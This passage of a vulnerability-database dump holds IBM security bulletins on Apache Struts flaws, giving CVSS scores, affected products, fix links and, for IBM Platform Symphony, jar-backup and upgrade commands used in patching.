SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:21:52", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:21:52", "id": 
"20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "href": "https://www.ibm.com/support/pages/node/6356621", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:12", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:07:08", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:07:08", "id": "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "href": "https://www.ibm.com/support/pages/node/6359445", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T19:06:03", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerablity\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management 
Apache Struts vulnerablity", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-05-11T01:06:34", "id": "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "href": "https://www.ibm.com/support/pages/node/6565845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T18:56:43", "description": "## Summary\n\nIBM Sterling File Gateway has addressed multiple security vulnerabilities in Apache Struts\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. 
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling File Gateway| 2.2.0.0 - 6.0.3.2 \n \n## Remediation/Fixes\n\n** Product & Version**| **APAR**| ** Remediation & Fix** \n---|---|--- \n2.2.0.0 - 2.2.6.5_2| IT34076| Apply IBM Sterling B2B Integrator version 5.2.6.5_3, 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n6.0.0.0 - 6.0.3.2| IT34076| Apply IBM Sterling B2B Integrator version 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T15:14:01", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-07-22T15:14:01", "id": "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "href": "https://www.ibm.com/support/pages/node/6324787", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T18:04:21", "description": "## Summary\n\nMultiple vulnerabilities in Apache Struts 2.3.x may affect IBM eDiscovery Manager. These are addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double evaluation of tag attributes. By forcing OGNL evaluation of specially-crafted data using the %{...} syntax, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223990](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223990>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \neDiscovery Manager| 2.2.2 \n \n## Remediation/Fixes\n\nProduct\n\n| VRM| Remediation \n---|---|--- \nIBM eDiscovery Manager| 2.2.2| \n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-WIN-IF008&source=SAR> \"Interim Fix 008\" ) for Windows\n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-AIX-IF008&source=SAR> \"Interim Fix 008\" ) for AIX \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T10:00:46", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Apache Struts Affect IBM eDiscovery Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", 
"CVE-2021-31805"], "modified": "2023-07-12T10:00:46", "id": "80737D4B4CE626670083B16CA387FEFAC8045ECB16DACD55AD56FFAC544F21A4", "href": "https://www.ibm.com/support/pages/node/7011373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:52:34", "description": "## Summary\n\nIBM OpenPages GRC Platform Web Applications are not vulnerable to the Apache Struts 2 vulnerability CVE-2017-5638 \n\n## Vulnerability Details\n\nIBM OpenPages GRC Platform Web Applications are NOT vulnerable to the Apache Struts 2 vulnerability (CVE-2017-5638). \nPlease refer to [_https://cwiki.apache.org/confluence/display/WW/S2-045_](<https://cwiki.apache.org/confluence/display/WW/S2-045>) for more information on CVE-2017-5638.\n\n## Affected Products and Versions\n\nIBM OpenPages versions 7.0 through 7.3\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:49:16", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform Web Applications are not vulnerable to (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:49:16", "id": "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "href": "https://www.ibm.com/support/pages/node/294331", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:11", "description": "## Summary\n\nA Security vulnerability relating to remote code execution CVE-2017-5638 (S2-045) has been reported against Apache Struts 2, which IBM Platform Symphony uses as a framework for its WEBGUI service. The Struts 2 package version that is vulnerable to these issues is included in several past versions of IBM Platform Symphony Advanced Edition and Developer Edition. Struts 2.3.32 addresses this vulnerability and can be applied through the manual steps detailed in the Remediation section.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)\n\n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \n\n**CVSS Base Score:** **7.3**\n\n**CVSS Temporal Score: See **[**_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \n\n**CVSS 3.0 Environmental Score*:** **Undefined**\n\n**CVSS Vector:** **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)**\n\n## Affected Products and Versions\n\nIBM Platform Symphony **6.1.1, 7.1 Fix Pack 1**, and** 7.1.1**,** **and** **IBM Spectrum Symphony** 7.1.2** and **7.2**. All OS editions, including Linux and Windows, are affected. The remediation steps for Linux are provided in this document. 
For Windows, use the Linux steps as a reference and find the correct path for patching.\n\n## Remediation/Fixes\n\n1\\. For IBM Platform Symphony 6.1.1 or 7.1 Fix Pack 1, download the appropriate fix and follow the instructions in the readme file to upgrade to Struts version 2.3.32. \n\n**Product version**| **Fix ID** \n---|--- \nIBM Platform Symphony **6.1.1**| [_sym-6.1.1-build446371_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-6.1.1-build446371&includeSupersedes=0>) \nIBM Platform Symphony **7.1 Fix Pack 1**| [_sym-7.1-build446807_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1-build446807&includeSupersedes=0>) \n2\\. For IBM Platform Symphony 7.1.1 and higher, follow the steps to update to Struts version 2.3.32 on Linux hosts: 2.1 Log on to each management host in the cluster and download the struts-2.3.32-lib.zip package from the following location: [](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>)[_http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip_](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>) 2.2 Stop the Platform Management Console service (WEBGUI): > egosh service stop WEBGUI 2.3 For backup purposes, move the following files, which will be replaced by new files: **\\- For IBM Platform Symphony 7.1.1:** \n> mkdir -p /tmp/guibackup/symgui \n> mkdir -p /tmp/guibackup/perfgui \n> mv $EGO_TOP/gui/3.3/lib/commons-fileupload-1.3.1.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/3.3/lib/commons-io-1.2.jar /tmp/guibackup/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-fileupload-*.jar /tmp/guibackup/symgui/ \n> mv 
$EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/org.apache.commons-io-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-lang3-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/javassist-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-json-plugin-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-spring-plugin-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xstream-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n> mkdir -p /tmp/guibackup/egogui \n> mkdir -p /tmp/guibackup/perfgui \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-fileupload-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-io-*.jar /tmp/guibackup/ \n> mv 
$EGO_TOP/gui/$EGO_VERSION/lib/commons-lang3-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/org.apache.commons-io-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/freemarker-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/javassist-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/ognl-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-core-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-json-plugin-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-spring-plugin-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/xwork-core-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/xstream-*.jar /tmp/guibackup/egogui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/egogui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui \n> mkdir -p /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv 